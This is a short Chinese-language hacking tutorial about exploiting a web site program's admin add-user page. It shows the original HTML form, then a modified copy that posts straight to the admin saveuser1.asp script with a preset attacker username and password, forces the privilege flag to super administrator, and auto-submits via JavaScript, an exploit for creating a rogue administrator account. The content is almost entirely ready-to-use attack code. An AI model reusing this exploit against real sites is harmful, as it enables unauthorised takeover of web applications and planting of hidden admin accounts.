[图文]跨出权限—世纪热线全站程序完美版漏洞利用(图)

<form method="post" action="saveuser1.asp" name="form1" onsubmIT="javascript:return check();">
 <table width="396" border="0" cellspacing="1" cellpadding="0">
 <tr bgcolor="#0099FF">
 <td height="25" width="392">
 <div align="center">
 <font size="2">新增管理员</font></div>
 </td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">用 户 名　 <input type="text" name="username" size="20">
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">　</td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">初始密码　 <input type="password" name="newpin" size="20">
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">
 <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">确认密码　 <input type="password" name="re_newpin" size="20">
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">
 <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <p align="center"><span lang="zh-cn">&nbsp;</span>权限设置 <span lang="zh-cn">&nbsp;
 </span><select size="1" name="flag">
 <option selected value="4">====无管理权限====</option>
 <option value="3">====初级管理员====</option>
 <option value="2">====高级管理员====</option>
 <option value="1">====超级管理员====</option>
 </select></td>
 <td height="30" style="color: black; border-style: none" width="138">　</td>
 </tr>
 </table>
 <p><input type="submit" name="SubmIT" value="确定"> </p>
 </form>

其实这个我们只在稍稍改动一下就可以了，改好的代码如下：

<form method="post" action="http://127.0.0.1/admin/saveuser1.asp">
 <table width="396" border="0" cellspacing="1" cellpadding="0">
 <tr bgcolor="#0099FF">
 <td height="25" width="392">
 <div align="center">
 <font size="2">新增管理员</font></div>
 </td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">用 户 名　 <input type="text" name="username" size="20" value="hacklu119"> ’添加管理员名字
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">　</td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">初始密码　 <input type="password" name="newpin" size="20" value="hack11911"> ’添加管理员密码
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">
 <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <div align="center">
 <font size="2">确认密码　 <input type="password" name="re_newpin" size="20" value="hack11911"> ’确认管理员密码
 </font>
 </div>
 </td>
 <td height="30" style="color: black; border-style: none" width="138">
 <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
 </tr>
 <tr>
 <td height="30" style="color: black; border-style: none" width="253">
 <p align="center"><span lang="zh-cn">&nbsp;</span>权限设置 <span lang="zh-cn">&nbsp;
 </span><select size="1" name="flag">
 <option selected value="1">====无管理权限====</option> ’设置为超级管理员,注意这里是1
 <option value="3">====初级管理员====</option>
 <option value="2">====高级管理员====</option>
 <option value="1">====超级管理员====</option>
 </select></td>
 <td height="30" style="color: black; border-style: none" width="138">　</td>
 </tr>
 </table>
 <p><input type="submit" name="SubmIT" value="确定"> </p>

 <p>　</p>
 <p align="center">
<script language="javascript"> ’用javascript脚本叫程序自动运行
this.document.forms[0].submIT()
</script>
</div>
</form>